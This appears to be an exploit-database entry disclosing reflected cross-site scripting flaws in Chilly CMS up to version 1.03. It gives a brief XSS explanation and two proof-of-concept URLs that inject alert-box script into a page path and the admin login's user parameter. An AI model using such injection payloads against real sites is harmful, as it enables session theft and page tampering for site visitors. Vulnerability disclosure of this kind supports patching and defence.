Chilly CMS <= 1.03 Non Persistent XSS Vulnerabilities

2010-03-13T00:00:00
ID 1337DAY-ID-9644
Type zdt
Reporter EgoPL
Modified 2010-03-13T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================
Chilly CMS <= 1.03 Non Persistent XSS Vulnerabilities
=====================================================

# Description of the webapp: chillyCMS is a Content Management System. This is a software which allows you to create a website without any programming skills. # XSS by the Wikipedia. Cross-site scripting holes are web application vulnerabilities which allow attackers to bypass client-side security mechanisms normally imposed on web content by modern browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are therefore a special case of code injection. # Proof of concept

http://localhost/chillyCMS/core/show.site.php/>'><script>alert("EgoPL says: I'm a XSS"</script>

http://localhost:80/chillyCMS/admin/login.site.php?user=>'><script>alert("EgoPL says: I'm a XSS"</script>



#  0day.today [2018-04-14]  #